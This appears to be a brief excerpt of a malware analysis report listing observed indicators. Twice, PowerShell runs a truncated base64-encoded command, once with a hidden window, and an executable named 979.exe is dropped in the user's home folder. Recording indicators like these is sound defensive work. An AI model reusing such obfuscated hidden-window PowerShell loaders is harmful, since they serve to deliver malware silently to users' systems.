Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...
- %HOMEPATH%\979.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...' (with hidden window)